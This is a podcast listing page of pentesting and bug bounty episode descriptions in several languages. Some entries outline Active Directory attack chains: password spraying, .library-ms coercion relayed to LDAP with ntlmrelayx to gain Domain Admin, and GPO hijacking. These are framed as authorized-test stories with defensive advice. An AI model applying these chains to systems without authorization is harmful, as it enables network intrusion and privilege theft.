Podcasts about pentest

Episode 180: In this episode of Critical Thinking - Bug Bounty Podcast we're joined by Steve Hernandez, founder of the Bug Bounty Maturity Framework (BBMF), to walk us through the inaugural State of Bug Bounty Maturity Posture Report. We go through the scores and cover Asset Hygiene, Operational Signal, how to re-engage the relationship between trust and researcher participation.Follow us on twitter at: https://x.com/ctbbpodcastGot any ideas and suggestions? Feel free to send us any feedback here: info@criticalthinkingpodcast.ioShoutout to YTCracker for the awesome intro music!====== Links ======Follow your hosts Rhynorater, rez0 and gr3pme on X: https://x.com/Rhynoraterhttps://x.com/rez0__https://x.com/gr3pmeCritical Research Lab:https://lab.ctbb.show/ Need a Pentest? We just launched CTBB Pentests!https://pentest.ctbb.show/Hack full time? Check out the Full-Time Hunter's Guild!https://ctbb.show/fthg====== Ways to Support CTBBPodcast ======Hop on the CTBB Discord at https://ctbb.show/discord!We also do Discord subs at $25, $10, and $5 - premium subscribers get access to private masterclasses, exploits, tools, scripts, un-redacted bug reports, etc.You can also find some hacker swag at https://ctbb.show/merch!Today's Guest: https://x.com/SteveHernandezMEmail Steve at info@bugbountymaturity.comFill out this form to enter a Critical Thinkers rafflehttps://forms.ctbb.show/mdaz====== Resources ======State of Bug Bounty Maturity Posturehttps://bugbountymaturity.com/research/state-of-bug-bounty-maturity-posture-2026Take the Bug Bounty Maturity Assessmenthttps://bugbountymaturity.com/assessmentAI Is Compressing the Bug Bounty Maturity Curvehttps://bugbountymaturity.com/research/ai-is-compressing-the-bug-bounty-maturity-curve====== Timestamps ======(00:00:00) Introduction(00:04:09) State of Bug Bounty Maturity Posture(00:22:33) Researcher Interface & Program Trust(00:44:38) Maturity Bands and Scoring (01:08:19) AI Is Compressing the Bug Bounty Maturity Curve

In dieser Folge von „Cyber Security ist Chefsache" sprechen Nico und Ann-Kathrin mit Andreas Krüger, Gründer und Geschäftsführer von Laokoon SecurITy, über ein Thema, bei dem in der Praxis ständig Begriffe durcheinandergeworfen werden: Penetrationstests, und warum gerade im OT- und Hardware-Umfeld vieles anders läuft als in der klassischen IT. Andreas kommt selbst aus dem Bundeswehr-Umfeld, hat dort das Hacken von der Pike auf gelernt und betreibt heute ein eigenes Labor für Hardware- und OT-Pentests.Zum Einstieg räumt Andreas mit dem „bunten Blumenstrauß" aus Pentest, Schwachstellenscan, Red Teaming und Hardware-Hacking auf. Sein Bild dafür ist eine Pyramide: Sie beginnt unten bei der konzeptionellen Absicherung, also klaren Dokumenten, Prozessen und einem sauberen Asset-Management. Darauf folgen der breit angelegte Schwachstellenscan, der nur bereits bekannte Muster findet, dann der fokussierte Pentest, der bewusst die Angreiferperspektive einnimmt und auch unbekannte Lücken sucht, und schließlich das Red Teaming, das eher Prozesse prüft und im besten Fall als Purple Teaming gemeinsam mit dem Verteidiger-Team läuft. Seine klare Botschaft an Unternehmen: Überspringt keine Stufe der Pyramide, und beginnt mit dem Fundament statt mit der spektakulären Übung.Besonders ehrlich wird das Gespräch beim Unterschied zwischen IT und OT. Ein OT-Pentest ist für Andreas eine „Operation am offenen Herzen": Man kann nicht einfach einen automatisierten Scanner über eine laufende Produktionsanlage jagen, sondern braucht echtes Prozessverständnis, Referenz- oder Laborsysteme und oft auch den Blick auf physische Sicherheit und Social Engineering. Genau hier sieht er ein Marktproblem: Immer mehr IT-Beratungen drängen ohne echte Expertise in den OT-Markt und machen mit „grünen Häkchen" den Preis kaputt. Wie man einen wirklich kompetenten Anbieter erkennt, woran man Scharlatane entlarvt und warum Pentests, die aus Compliance-Gründen unbedingt „grün" sein müssen, das eigentliche Ziel sabotieren, diskutieren die drei sehr offen.Im Gespräch geht es außerdem um:Den Unterschied zwischen Schwachstellenscan, Pentest, Red Teaming und Hardware-Hacking, ohne Buzzword-NebelWarum Asset-Management und die kritischen Pfade der Ausgangspunkt jedes sinnvollen Tests sindWarum ein OT-Pentest „Operation am offenen Herzen" ist und auf Referenz- statt Produktionssystemen gehörtWie physische Sicherheit, Social Engineering und sogar Drohnen ins Spiel kommenWoran man einen seriösen Anbieter erkennt, und warum manche Beratungen den OT-Markt kaputtmachenWarum Compliance-getriebene Pentests, die „grün" sein müssen, kontraproduktiv sindWie oft man wirklich testen sollte, mindestens jährlich und nach jeder großen Änderung, nicht alle drei JahreWelche Rolle KI im Pentesting spielt, stark beim Report und der Ausbildung, riskant als Ersatz für echtes VerständnisWarum „Prompt Engineering" kein Pentest ist und Leidensfähigkeit zum Handwerk gehörtHardware als Nischenmarkt: offene Debug-Schnittstellen, Seitenkanalangriffe und Firmware als GoldgrubeDie Anekdote mit dem Computerspiel auf dem Geräte-Display, das den Hardware-Zugriff beweisen sollteLieferketten und digitale Souveränität: zugelieferte Chips, versteckte Menüs und Europas blinde FleckenEinsteiger-Tipps für Studierende: erst die Basics verstehen (TCP/IP, Protokolle), dann Plattformen wie Capture the FlagEine sehr praxisnahe Folge für IT- und OT-Verantwortliche, Sicherheitsbeauftragte, Hersteller und alle, die wissen wollen, was ein Pentest wirklich leistet, und die nicht erst im Ernstfall merken wollen, dass „Häkchen grün" eben nicht „sicher" bedeutet.____________________________________________

Episode 179: In this episode of Critical Thinking - Bug Bounty Podcast we talk about how to stay motivated and keep the vibes strong during this trying time for Bug Bounty.Follow us on twitter at: https://x.com/ctbbpodcastGot any ideas and suggestions? Feel free to send us any feedback here: info@criticalthinkingpodcast.ioShoutout to YTCracker for the awesome intro music!====== Links ======Follow your hosts Rhynorater, rez0 and gr3pme on X: https://x.com/Rhynoraterhttps://x.com/rez0__https://x.com/gr3pmeCritical Research Lab:https://lab.ctbb.show/ Need a Pentest? We just launched CTBB Pentests!https://pentest.ctbb.show/Hack full time? Check out the Full-Time Hunter's Guild!https://ctbb.show/fthg====== Ways to Support CTBBPodcast ======Hop on the CTBB Discord at https://ctbb.show/discord!We also do Discord subs at $25, $10, and $5 - premium subscribers get access to private masterclasses, exploits, tools, scripts, un-redacted bug reports, etc.You can also find some hacker swag at https://ctbb.show/merch!Today's Sponsor: Check out Zero Trust Cloud Access:https://www.threatlocker.com/capabilities/zero-trust-cloud-access====== Timestamps ======(00:00:00) Introduction(00:04:57) Managing Hacker Motivation(00:10:45) Community, Competition, & Curosity(00:16:54) Using AI with Passion(00:23:10) The LHE Method & Sharing Wins(00:28:01) Video POCs, Scripts, & Talking about Bugs(00:40:49) Watching your health & stopping mid-hack

Episode 178: In this episode of Critical Thinking - Bug Bounty Podcast we're back with BruteCat to finish up our discussion on hacking Google. This week we hit AI.Follow us on twitter at: https://x.com/ctbbpodcastGot any ideas and suggestions? Feel free to send us any feedback here: info@criticalthinkingpodcast.ioShoutout to YTCracker for the awesome intro music!====== Links ======Follow your hosts Rhynorater, rez0 and gr3pme on X: https://x.com/Rhynoraterhttps://x.com/rez0__https://x.com/gr3pmeCritical Research Lab:https://lab.ctbb.show/ Need a Pentest? We just launched CTBB Pentests!https://pentest.ctbb.show/Hack full time? Check out the Full-Time Hunter's Guild!https://ctbb.show/fthg====== Ways to Support CTBBPodcast ======Hop on the CTBB Discord at https://ctbb.show/discord!We also do Discord subs at $25, $10, and $5 - premium subscribers get access to private masterclasses, exploits, tools, scripts, un-redacted bug reports, etc.You can also find some hacker swag at https://ctbb.show/merch!Today's Guest: https://x.com/brutecat====== Resources ======Hacking Google with AIhttps://brutecat.com/articles/hacking-google-with-ai/====== Timestamps ======(00:00:00) Introduction(00:03:07) Discovery Docs Refresher & AI at BugSWAT Mexico(00:30:49) Auth & Enumeration of Referer and Origin(00:45:59) Pwning Google Stories(01:09:32) Batch Execute & GraphQL

Episode 177: In this episode of Critical Thinking - Bug Bounty Podcast we're joined by BruteCat to talk about his journey hacking Google Cloud, Gmail, Youtube, and Google Phone.Follow us on twitter at: https://x.com/ctbbpodcastGot any ideas and suggestions? Feel free to send us any feedback here: info@criticalthinkingpodcast.ioShoutout to YTCracker for the awesome intro music!====== Links ======Follow your hosts Rhynorater, rez0 and gr3pme on X: https://x.com/Rhynoraterhttps://x.com/rez0__https://x.com/gr3pmeCritical Research Lab:https://lab.ctbb.show/ Need a Pentest? We just launched CTBB Pentests!https://pentest.ctbb.show/Hack full time? Check out the Full-Time Hunter's Guild!https://ctbb.show/fthg====== Ways to Support CTBBPodcast ======Hop on the CTBB Discord at https://ctbb.show/discord!We also do Discord subs at $25, $10, and $5 - premium subscribers get access to private masterclasses, exploits, tools, scripts, un-redacted bug reports, etc.You can also find some hacker swag at https://ctbb.show/merch!Today's Sponsor: Check out Zero Trust Cloud Access from ThreatLockerhttps://www.criticalthinkingpodcast.io/tl-ztcaToday's Guest: https://x.com/brutecat====== Resources ======StubZero: $148,337 RCE in Google Cloud Productionhttps://brutecat.com/articles/google-cloud-rce/Leaking the email of any YouTube user for $10,000https://brutecat.com/articles/leaking-youtube-emails/Disclosing YouTube Creator Emails for a $20k Bountyhttps://brutecat.com/articles/youtube-creator-emails/Leaking the phone number of any Google userhttps://brutecat.com/articles/leaking-google-phones/====== Timestamps ======(00:00:00) Introduction(00:29:14) 2nd RCE in Application Integration(00:39:55) BruteCat's Background & RCE Follow-up Questions(00:48:02) Google VRP and Youtube Bugs(01:10:17) Google Phone Leak(01:18:36) Discovery Docs and Episode 178 Teaser

Hey friends! Today we're going deep on external network pentesting — something I realize we've barely touched in however many episodes we've done. I'm currently in a long stretch of back-to-back external assessments, so it felt like a good time to talk about it. Here's what we get into: Scoping headaches — why the old "count your public IPs and multiply by a big hourly rate" approach drives me crazy, and how we actually scope external tests to be fair to everyone Web apps in scope or not? — this needs its own conversation before the test starts, and skipping it causes pain later Testing under real conditions — the debate around whether to request an allowlist vs. scanning as-is, and why I lean toward creating the best testing environment possible Multi-tool enumeration — why we run Nessus, Project Discovery, and Shodan together, and what each catches that the others miss Reporting the surface — why just walking a customer through what's exposed to the internet (ports, services, screenshots) has more value than I used to give it credit for SNMP and NTP findings — two protocols that keep showing up open when they really (probably) shouldn't be OSINT phase — how we've grown externals to include open-source intelligence work on the customer's domains, not just IP-level scanning WordPress hygiene — it keeps coming up on these assessments, and I've got some practical recommendations Dorking and metadata searches — using AI to quickly sift through publicly exposed documents for things attackers could use to pretext a social engineering attack Subdomain hijacking — a sneaky attack path I've seen in the wild that flies right in the face of all the "check if the URL is spelled right" advice we give users Even when the technical findings are pretty quiet, there's a lot you can do to punch up an external pentest report with stuff that's genuinely valuable to customers!

Episode 176: In this episode of Critical Thinking - Bug Bounty Podcast we're joined by top Adobe hacker Jim Green to deep-dive AEM. We talk through Sling selectors, Permissions, and how to spot AEM Red Flags.Follow us on twitter at: https://x.com/ctbbpodcastGot any ideas and suggestions? Feel free to send us any feedback here: info@criticalthinkingpodcast.ioShoutout to YTCracker for the awesome intro music!====== Links ======Follow your hosts Rhynorater, rez0 and gr3pme on X: https://x.com/Rhynoraterhttps://x.com/rez0__https://x.com/gr3pmeCritical Research Lab:https://lab.ctbb.show/ Need a Pentest? We just launched CTBB Pentests!https://pentest.ctbb.show/Hack full time? Check out the Full-Time Hunter's Guild!https://ctbb.show/fthg====== Ways to Support CTBBPodcast ======Hop on the CTBB Discord at https://ctbb.show/discord!We also do Discord subs at $25, $10, and $5 - premium subscribers get access to private masterclasses, exploits, tools, scripts, un-redacted bug reports, etc.You can also find some hacker swag at https://ctbb.show/merch!Today's Sponsor: Adobe. Earn more for AI bugs with Adobe's new AI Tier! https://blog.adobe.com/security/adobe-expands-bug-bounty-program-to-incentivize-ai-security-researchAlso don't forget to also grab a 10% bonus for valid AI vulnerabilities in Adobe Stock and Lightroom Web. Use code: CTBB063026 in your report.Expires June 30, 2026. ====== This Week in Bug Bounty ======Scaling Bug Bounty triage in the AI era(https://www.yeswehack.com/security-best-practices/scaling-bug-bounty-triage-ai)The AI impact: a triager's perspectivehttps://www.intigriti.com/blog/business-insights/the-ai-impact-a-triagers-perspective====== Resources ======Sling Selectors - The Key to Unlocking AEM's Attack Surfacehttps://greenjam.co.uk/blog/sling-selectors/Just a Moment CTFhttps://poc.greenjam.co.uk/just-a-moment.htmlGeneral XSS jquery .text()https://poc.greenjam.co.uk/text-xss.htmlURL XXS Challengehttps://poc.greenjam.co.uk/url-xss.html====== Timestamps ======(00:00:00) Introduction(00:04:35) Background and AEM Bug(00:17:40) Sling Selectors & the Tech Stack(00:38:14) Permissions & Apache Sling Resolution(01:01:37) The Bugs & AEM Red Flags(01:31:55) Moment in Time CTF(01:40:38) General XSS jquery .text()(01:45:45) URL XXS Challenge

Episode 175: In this episode of Critical Thinking - Bug Bounty Podcast we're comparing Hackbot setups and results. We also talk about some of the recent ZDI drama, as well as the importance of freaking beautiful POCsFollow us on twitter at: https://x.com/ctbbpodcastGot any ideas and suggestions? Feel free to send us any feedback here: info@criticalthinkingpodcast.ioShoutout to YTCracker for the awesome intro music!====== Links ======Follow your hosts Rhynorater, rez0 and gr3pme on X: https://x.com/Rhynoraterhttps://x.com/rez0__https://x.com/gr3pmeCritical Research Lab:https://lab.ctbb.show/ Need a Pentest? We just launched CTBB Pentests!https://pentest.ctbb.show/Hack full time? Check out the Full-Time Hunter's Guild!https://ctbb.show/fthg====== Ways to Support CTBBPodcast ======Hop on the CTBB Discord at https://ctbb.show/discord!We also do Discord subs at $25, $10, and $5 - premium subscribers get access to private masterclasses, exploits, tools, scripts, un-redacted bug reports, etc.You can also find some hacker swag at https://ctbb.show/merch!Today's Sponsor: Check out Zero Trust Cloud Access from ThreatLockerhttps://www.criticalthinkingpodcast.io/tl-ztca====== Resources ======Another day, another universal linux LPEhttps://x.com/v12sec/status/2054491454064746629ZDI Dramahttps://x.com/ryotkak/status/2052881664909660521Orange Tsai Bug on Edgehttps://x.com/thezdi/status/2054868495888777266Chompie's Exploit in NV Container Toolkithttps://x.com/chompie1337/status/2054882193055601140GitHub Security April bug bounty statshttps://x.com/GitHubSecurity/status/2054274356403138932====== Timestamps ======(00:00:00) Introduction(00:02:14) q param prompt injection & Mobile CSPT(00:14:17) Admin API Key MegaCrit(00:17:13) Hackbots(00:37:10) Pretty POCs and ZDI Drama(00:44:48) GitHub Security April Stats

Episode 174: In this episode of Critical Thinking - Bug Bounty Podcast we follow up from last episode with some advice for BB platforms, as well as cover a slew of writeups from Searchlight Cyber, watchTowr, and Starstrike.Follow us on twitter at: https://x.com/ctbbpodcastGot any ideas and suggestions? Feel free to send us any feedback here: info@criticalthinkingpodcast.ioShoutout to YTCracker for the awesome intro music!====== Links ======Follow your hosts Rhynorater, rez0 and gr3pme on X: https://x.com/Rhynoraterhttps://x.com/rez0__https://x.com/gr3pmeCritical Research Lab:https://lab.ctbb.show/ ====== Ways to Support CTBBPodcast ======Hop on the CTBB Discord at https://ctbb.show/discord!We also do Discord subs at $25, $10, and $5 - premium subscribers get access to private masterclasses, exploits, tools, scripts, un-redacted bug reports, etc.You can also find some hacker swag at https://ctbb.show/merch!Need a Pentest? We just launched CTBB Pentests!https://pentest.ctbb.show/Hack full time? Check out the Full-Time Hunter's Guild!https://ctbb.show/fthg====== This Week in Bug Bounty ======COST, AI frontier models and more: A measured take on the future of security testinghttps://www.yeswehack.com/security-best-practices/cost-mythos-future-security-testingCommon AI misconceptions debugged!https://www.intigriti.com/blog/business-insights/common-misconceptions-debugged#trend-3-validity-ratios-remain-constant-ai-slop-isnt-rising-as-a-proportionBountySync + Socialhttps://luma.com/bountysync_social====== Resources ======Ghosts of Encryption Pasthttps://slcyber.io/research-center/ghosts-of-encryption-past-salesforce-exacttarget/tessl Skill Optimizerhttps://tessl.io/registry/tessl/skill-optimizer/0.8.0The Internet Is Falling Down, Falling Down, Falling Downhttps://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/High Fidelity Check for the cPanel Authentication Bypasshttps://slcyber.io/research-center/high-fidelity-check-for-the-cpanel-authentication-bypass-cve-2026-41940/Achieving Deterministic Prompt Injection Through Client-Side Feedback Loopshttps://blog.starstrike.ai/posts/achieving-deterministic-prompt-injection-through-client-side-feedback-loops/GPT-5.5: Mythos-Like Hacking, Open To Allhttps://xbow.com/blog/mythos-like-hacking-open-to-allRemote Command Execution in Google Cloud with Single Directory Deletionhttps://flatt.tech/research/posts/remote-command-execution-in-google-cloud-with-single-directory-deletion/?utm_source=bugbountydaily.com&utm_medium=referral====== Timestamps ======(00:00:00) Introduction(00:09:20) AMPScript(00:25:10) Tessl Skill Optimizer(00:33:07) cPanel & WHM Authentication Bypass(00:40:46) Advice for Bug Bounty Programs(00:50:07) Prompt Injection Through Client-Side Feedback Loops(00:54:37) GPT 5.5(01:01:00) Remote Command Execution in Google Cloud

Hey friends! Today's another Tales of Pentest Pwnage! Quick tangent first on a couple side projects: I've got a music thing at quack.house (like the duck noise, not the drug) and a podcast with my dancer son Atticus at DadOfADancer.com. Speaking of Atticus — he just landed a spot in Master Ballet Academy's summer program in Phoenix, and I am a very proud dance dad over here. OK, on to the pentest: A weird runas quirk: If your AD test account password ends in a percent sign, runas seems to misbehave (Claude thinks Windows is interpreting the % as a variable delimiter). Workaround: runascs.exe, which wraps your tool launch with creds inline. Worked like a champ — notes over on the 7MinSec.wiki. Standard first pass: PingCastle for the AD overview, then Snaffler for share crawling, with Chimas as a nicer web UI for searching the Snaffler JSON. The "Snaffler missed something" moment: Snaffler is great but it primarily uses pattern matching, so manual review of interesting directories still matters. I found a PowerShell script with a funky obfuscation routine, fed it to Claude for context, tracked down the function definition, and ended up decrypting a local admin password. Going loud: SMB-sprayed that cred across the subnets → handful of machines popped → ran a deeper, targeted Snaffler against just those boxes → enumerated sessions and spotted a domain admin interactively logged in. Plan A fizzled: Wanted to pull off a favorite trick — sneak in via WinRM and queue a scheduled task as the logged-in DA (no password needed). WinRM was disabled. Oh fart. Plan B — the "trap" file: Dropped a malicious .library-ms file directly into the DA's desktop folder. No clicks required — just the desktop being open is enough to trigger an HTTP coercion to my evil box. (Caveat: I think you need a DNS record or computer object that the victim box trusts as "intranet zone.") The escalation: Had ntlmrelayx standing by, ready to relay to LDAP on a DC. The coerced auth fired the moment the "trap" file landed on disk. An interactive LDAP shell fired in the DA's context, and I used it to add my low-priv account to the Domain Admins group. Defense angles: Rather than chase each technique individually (LDAP signing, web client GPOs, library-ms neutralization, etc.), I like to back up to the systemic fixes that break the chain earlier. Big ones here: deploy LAPS so a single decrypted local admin password isn't a master key everywhere, and a thorough sweep for sensitive data and custom obfuscation routines hanging out on shares. Got thoughts on any of this? Shoot 'em over — I always love hearing how you'd have tackled things differently.

Im Dezember 2025 wurde eine Studie der Stanford University und der Carnegie Mellon University veröffentlicht, bei der eine KI gegen 10 Pentester angetreten ist. In vielen Berichten über die Studie wurde berichtet, dass die KI besser und viel günstiger als menschlichen Pentester war. Doch diese Aussagen sind etwas (zu) isoliert betrachtet. Dennoch ist es spannend sich die Ergebnisse der Studie mal etwas genauer anzuschauen. Andreas Wisler und Sandro Müller haben genau das für Euch gemacht.

3 ans après notre première visite, il est temps de voir si la reine des plateformes Cyber est toujours d'actualité... Est-ce que l'IA a détruit le monde des CTFs et de l'apprentissage ?En compagnie d'un de nos premiers invités, et MVP HackTheBox, monsieur Euz !Les émissions sont enregistrées en live sur Twitch et redifusée sur Youtube avant de devenir des Podcast.Venez assister à l'enregistrement en live !Hébergé par Ausha. Visitez ausha.co/politique-de-confidentialite pour plus d'informations.

In this episode of the Unsecurity Podcast, hosts Brad Nigh and Megan Larkins speak with Samantha Floyd, an associate penetration tester and active member of Blacks in Cyber and Black Women in Cyber.Together, they talk about Samantha's shift from marketing to the cyber industry, including:The thrill and ethics of hacking and CTFsThe power of inclusive communitiesReducing barriers and amplifying diverse perspectivesPractical web app pen testing insightsChallenges pen testers faceThe importance of support and mentorship in career transitions Like, subscribe, and share with your network to stay informed about the latest in cyber and information security!We want to hear from you! Reach out at unsecurity@frsecure.com and follow us for more:LinkedIn: https://www.linkedin.com/company/frsecure/Instagram: https://www.instagram.com/frsecureofficial/Facebook: https://www.facebook.com/frsecure/BlueSky: https://bsky.app/profile/frsecure.bsky.socialAbout FRSecure:https://frsecure.com/FRSecure is a mission-driven information security consultancy headquartered in Minneapolis, MN. Our team of experts is constantly developing solutions and training to assist clients in improving the measurable fundamentals of their information security programs. These fundamentals are lacking in our industry, and while progress is being made, we can't do it alone. Whether you're wondering where to start or looking for a team of experts to collaborate with you, we are ready to serve.

Today is my favorite pentest pwnage tale of 2026 – and maybe ever!  It centers around an ADCS abuse via an attack path I'd never seen before.  Tips include: Use Netexec to pull Powershell history Trying to steal reg hives and the EDR is made?  Try copying them out to some-other-server.domain.comshare This post featured interesting use of the Responder -N option

Hola friends!  Today's another fun tale of pentest pwnage.  This time we started with no credentials and then set off on the bumpy journey from no-cred zero to domain admin hero!  One specific reference in today's podcast that may be helpful to you is setting up ntlmrelayx to listen on port 3128.

Hello friends!  We're back with a fun tale of internal network pentest pwnage.  This one highlights how AI can be used (with some guardrails!) to automate the boring stuff – and even help you pick part DLLs to find gold nuggets! P.S. – I do recommend you check out our last three episodes that are all about securing your community, and please check out this Rolling Stone article which will give you a full picture of what has been going on in Minnesota as it relates to the occupation of ICE agents.

In this episode, we explore why many organizations invest in penetration testing yet see little improvement in their actual security posture. We discuss the common pitfalls of treating pentests as one-time events, how attackers operate very differently from scoped assessments, and why remediation—not the report—is what determines real safety. If you've ever wondered why “passing” a pentest didn't translate into stronger defenses, this episode is for you.Blog: https://offsec.blog/Youtube: https://www.youtube.com/@cyberthreatpovTwitter: https://x.com/cyberthreatpov Follow Spencer on social ⬇Spencer's Links: https://go.spenceralessi.com/links Work with Us: https://securit360.com | Find vulnerabilities that matter, learn about how we do internal pentesting here.

In this episode, Brad and Jordan talk about API pen testing, how it works, and what you can expect if you want to procure one. They discuss pitfalls, common findings, and ways to streamline the process. Blog: https://offsec.blog/Youtube: https://www.youtube.com/@cyberthreatpovTwitter: https://x.com/cyberthreatpov Follow Spencer on social ⬇Spencer's Links: https://go.spenceralessi.com/links Work with Us: https://securit360.com | Find vulnerabilities that matter, learn about how we do internal pentesting here.

After sharing a recent story about how a phishing campaign went south, I heard feedback from a lot of you.  You either commiserated with my story, told me I wussed out, and/or had a difficult story of your own to share.  So I thought I'd keep this momentum up and share another story of fail with you – this time about a Web app pentest that went south.

Today we're thrilled to announce the launch of LPLITE:GOAD (Light Pentest Live Interactive Training Experience: Game of Active Directory). The first class is coming up Tuesday, January 27 – Thursday, January 29 (9:00 a.m. – 1:00 p.m. CST each day). More information, pricing information and more can be found at training.7minsec.com.  Today I talk about who should sign up for the course, what you should bring, and some of the awesome things you'll be doing should you choose to join me on this hacking adventure!

I'm so excited to share today's tale of pentest pwnage, because it brings back to life a coercion technique I thought wouldn't work against Windows 11! Spoiler alert: check out rpc2efs, as well as the 7MinSec Club episode we did on the topic this week. Also, our January Light Pentest LITE:GOAD class is open for registration here!

Hola friends!  My week has very much been about trying to turnaround pentest dropboxes as quickly as possible.  In that adventure, I came across two time-saving discoveries: Using a Proxmox LXC as a persistent remote access method Writing a Proxmox post-deployment script that installs Splashtop on the Windows VM, and resets the admin passwords on both VMs, all from the Proxmox SSH console without touching the console on either VM If you feel some of this is better seen than said, on this week's 7MinSec.club Tuesday TOOLSday broadcast we show this in more detail.

In this episode, we're discussing the pros and mostly the cons of notifying your SOC/MSSP before your penetration test. Spencer and Brad delve into the details of why it matters and share their experience from hundreds of penetration tests. Get your 2025 External Pentest done before time runs out! https://www.securit360.com/external-penetration-testing-services-sa/Blog: https://offsec.blog/Youtube: https://www.youtube.com/@cyberthreatpovTwitter: https://x.com/cyberthreatpov Follow Spencer on social ⬇Spencer's Links: https://go.spenceralessi.com/links Work with Us: https://securit360.com | Find vulnerabilities that matter, learn about how we do internal pentesting here.

Happy Thanksgiving week friends! Today we're celebrating a turkey and pie overload by sharing another fun tale of pentest pwnage! It involves using pygpoabuse to hijack a GPO and turn it into our pentesting puppet!  Muahahahahaah!!!!  Also: This week over at 7MinSec.club we looked at how to defend against some common SQL attacks We're very close to offering our brand new LPLITE:GOAD 3-day pentest course (likely in mid-January). It will get announced on 7MinSec.club first, so please make sure you're subscribed there (it's free!) Did you miss our talk called Should You Hire AI Run Your Next Pentest?  Check it out on YouTube!

Cyberangriffe werden härter, schneller und professioneller – doch wie sieht echte Abwehrarbeit im Alltag aus? In dieser Folge sprechen wir mit Dirk Reimers und Jannik Pewny von secunet über Pentesting, Incident Response und die Realität moderner Cybersecurity. Dirk erklärt, wie sich Pentests entwickelt haben, warum „einmal von außen auf die Firewall schauen“ selten ausreicht und wo Unternehmen heute den größten Impact erzielen. Jannik nimmt uns mit in den Ernstfall: Wie läuft ein Incident ab, welche Datenquellen zählen wirklich und wie bringt man Systeme wieder hoch? Außerdem sprechen wir über Teamkultur, den Einstieg in Pentest/IR/Forensik, gesuchte Profile und die On-Call-Realität im IR-Team. Wenn du wissen willst, wie moderne Cyberabwehr wirklich funktioniert – hör rein!

Hello friends, in today's episode I give an audio summary of a talk I gave this week at the MN GOVIT Symposium called "Should You Hire AI to Run Your Next Pentest?"  It's not a pro-AI celebration, nor is it an anti-AI bashing.  Rather, the talk focuses on my experiences using both free and paid AI services to guide me through an Active Directory penetration test.

Guest: Ari Herbert-Voss, CEO at RunSybil Topics: The market already has Breach and Attack Simulation (BAS), for testing known TTPs. You're calling this 'AI-powered' red teaming. Is this just a fancy LLM stringing together known attacks, or is there a genuine agent here that can discover a truly novel attack path that a human hasn't scripted for it? Let's talk about the 'so what?' problem. Pentest reports are famous for becoming shelf-ware. How do you turn a complex AI finding into an actionable ticket for a developer, and more importantly, how do you help a CISO decide which of the thousand 'criticals' to actually fix first? You're asking customers to unleash a 'hacker AI' in their production environment. That's terrifying. What are the 'do no harm' guardrails? How do you guarantee your AI won't accidentally rm -rf a critical server or cause a denial of service while it's 'exploring'? You mentioned the AI is particularly good at finding authentication bugs. Why that specific category? What's the secret sauce there, and what's the reaction from customers when you show them those types of flaws? Is this AI meant to replace a human red teamer, or make them better? Does it automate the boring stuff so experts can focus on creative business logic attacks, or is the ultimate goal to automate the entire red team function away? So, is this just about finding holes, or are you closing the loop for the blue team? Can the attack paths your AI finds be automatically translated into high-fidelity detection rules? Is the end goal a continuous purple team engine that's constantly training our defenses? Also, what about fixing? What makes your findings more fixable? What will happen to red team testing in 2-3 years if this technology gets better? Resource: Kim Zetter Zero Day blog EP230 AI Red Teaming: Surprises, Strategies, and Lessons from Google EP217 Red Teaming AI: Uncovering Surprises, Facing New Threats, and the Same Old Mistakes? EP68 How We Attack AI? Learn More at Our RSA Panel! EP71 Attacking Google to Defend Google: How Google Does Red Team  

In this episode of The Cyber Threat Perspective, we highlight the pentest findings that, frankly, have no business showing up in 2025. From accounts with weak passwords and no MFA to plaintext credentials on file shares, we break down the common misconfigurations and oversights that attackers still abuse, despite years of seeing the same issues over and over again. If you're an IT admin or security leader, this episode is your checklist of what to fix yesterday.Blog: https://offsec.blog/Youtube: https://www.youtube.com/@cyberthreatpovTwitter: https://x.com/cyberthreatpov Follow Spencer on social ⬇Spencer's Links: https://go.spenceralessi.com/links Work with Us: https://securit360.com | Find vulnerabilities that matter, learn about how we do internal assume breach pentesting here.

Today's tale of pentest pwnage involves: Using mssqlkaren to dump sensitive goodies out of SCCM Using a specific fork of bloodhound to find machines I could force password resets on (warning: don't do this in prod…read this!) Don't forget to check out our weekly Tuesday TOOLSday – live every Tuesday at 10 a.m. over at 7MinSec.club!

Hey friends, today I talk about how fun it was two combine two cool pentest tactics, put them in a blender, and move from local admin to mid-tier system admin access (with full control over hundreds of systems)! The Tuesday TOOLSday video we did over at 7minsec.club will help bring this to life as well.

https://offsec.blog/budgetIn this episode, we're tackling an often-overlooked opportunity: using pentest results to secure more budget for security initiatives. Too many organizations run a pentest, file the report away, and move on without leveraging it for strategic value. We'll break down how to translate findings into business language, influence leadership, and turn vulnerabilities into funding for better defenses.Blog: https://offsec.blog/Youtube: https://www.youtube.com/@cyberthreatpovTwitter: https://x.com/cyberthreatpov Follow Spencer on social ⬇Spencer's Links: https://go.spenceralessi.com/links Work with Us: https://securit360.com

No Kubicast de hoje nós recebemos o Leonardo Pinheiro, CRO da Clavis, para um papo direto ao ponto sobre como uma IA feita no Brasil resolve problemas do nosso cenário de cibersegurança. Falamos do Otto – a IA da Clavis –, de como ela nasceu de muita telemetria real de clientes e do porquê conhecer boleto, Pix, WhatsApp e a cadeia financeira nacional muda completamente o jogo. De quebra, confrontamos o mito do “100% seguro” e mostramos como risco, contexto e priorização guiam decisões melhores.Entramos a fundo na plataforma da Clavis (produto+serviço) e nos módulos que orbitam o Otto: gestão de vulnerabilidades, avaliação de fornecedores, correlação de eventos/EDR e validações em cloud. Discutimos quando automação brilha e quando ainda precisamos de gente experiente (ex.: pen test), além de como o Otto responde a perguntas de negócio (“qual meu score?”, “o que mitigar primeiro?”) e conecta tudo numa visão integrada.Também falamos de supply chain security, reputação e como decisões ruins de terceirização estouram no colo da sua marca. No final, tem um bloco sobre comunidade e carreira (SampaSec, Conecta 21, networking) e um respiro cultural com indicações.Links Importantes:- Leonardo Pinheiro - https://www.linkedin.com/in/leonardo-pinheiro-batista/- João Brito - https://www.linkedin.com/in/juniorjbn/- Assista ao FilmeTEArapia - https://youtu.be/M4QFmW_HZh0?si=HIXBDWZJ8yPbpflM- SampaSEC - https://www.linkedin.com/groups/9381855/?fbclid=PAZXh0bgNhZW0CMTEAAact9-j_AzTmFc136pGmO_GWesqvNdULEk-rMQSkGGSlFcpGCbyZLeElRcFVqg_aem_1W_jlM9Z0G5Q6BHoe76xLw- Kubicast 125 - https://www.youtube.com/watch?v=nG7sugocQsg- A vida de Chuck - https://www.imdb.com/pt/title/tt12908150/Hashtags#SegurancaDaInformacao #Ciberseguranca #InteligenciaArtificial #IA #Otto #Clavis #SupplyChainSecurity #PenTest 